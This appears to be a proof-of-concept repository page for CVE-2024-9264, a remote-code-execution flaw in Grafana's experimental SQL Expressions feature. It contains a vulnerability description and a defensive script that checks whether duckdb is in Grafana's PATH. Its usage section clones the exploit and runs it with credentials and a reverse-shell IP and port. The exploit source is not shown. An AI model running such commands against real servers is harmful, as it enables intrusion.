CVE-2024-9264 PoC — Grafana SQL Expressions allow for remote code execution

Associated Vulnerability
Title: Grafana SQL Expressions allow for remote code execution (CVE-2024-9264)
Description: The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.
Description
Authenticated RCE in Grafana (v11.0) via SQL Expressions - PoC Exploit
Readme

# CVE-2024-9264
Authenticated RCE in Grafana (v11.0) via SQL Expressions - PoC Exploit


---

### Introduction


CVE-2024-9264 is a critical remote-code-execution and local-file-inclusion flaw introduced in Grafana 11’s experimental “SQL Expressions” feature. The API passes user-supplied SQL straight to the DuckDB CLI without adequate sanitisation, so any authenticated account with Viewer or higher privileges can inject shell commands or read arbitrary files, provided the duckdb binary is in the server’s PATH.
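The precondition stated above, a `duckdb` binary reachable through the Grafana server's PATH, can be audited on a Linux host. The script below is an added example, not part of the PoC repository; the function names and the default `grafana` process pattern are assumptions.

```bash
#!/bin/sh
# Added example: audit the duckdb precondition for CVE-2024-9264 on a Linux host.

# find_duckdb_in_path PATH_STRING
# Prints every executable regular file named "duckdb" in the colon-separated
# PATH_STRING. Returns 0 if at least one was found, 1 otherwise.
# Runs in a subshell so the IFS and globbing changes do not leak to the caller.
find_duckdb_in_path() (
    IFS=:
    set -f                            # do not glob-expand directory names
    found=1
    for dir in $1; do
        [ -n "$dir" ] || dir=.        # an empty PATH entry means the current directory
        if [ -f "$dir/duckdb" ] && [ -x "$dir/duckdb" ]; then
            printf '%s\n' "$dir/duckdb"
            found=0
        fi
    done
    exit "$found"
)

# process_path PID
# Prints the PATH a process was started with, read from /proc/PID/environ.
process_path() {
    tr '\000' '\n' 2>/dev/null < "/proc/$1/environ" | sed -n 's/^PATH=//p'
}

# audit_grafana_duckdb [PATTERN]
# Assumption: Grafana processes match PATTERN (default "grafana") in `pgrep -f`.
# Returns 0 if any matching process can reach duckdb, 1 otherwise.
audit_grafana_duckdb() {
    exposed=1
    for pid in $(pgrep -f "${1:-grafana}"); do
        path=$(process_path "$pid")
        if [ -z "$path" ]; then
            echo "PID $pid: environment not readable (run as root)"
        elif find_duckdb_in_path "$path"; then
            echo "PID $pid: duckdb reachable, precondition for CVE-2024-9264 is met"
            exposed=0
        else
            echo "PID $pid: duckdb not in PATH"
        fi
    done
    return "$exposed"
}
```

Source the file on the Grafana host and call `audit_grafana_duckdb`; a hit means the host should be prioritised for patching or for removal of the `duckdb` binary.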

---

### Usage

```bash
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh

# usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
```

Example:

```bash
./exploit.sh http://grafana.example.com admin 'LMCOP4X2?29DX2%332!' 10.10.10.10 1337
```




File Snapshot

```
[4.0K] /data/pocs/82a8ba52c3abfb452904444bba25f1ba4f483de0
├── [1.9K] exploit.sh
└── [1.2K] README.md

0 directories, 2 files
```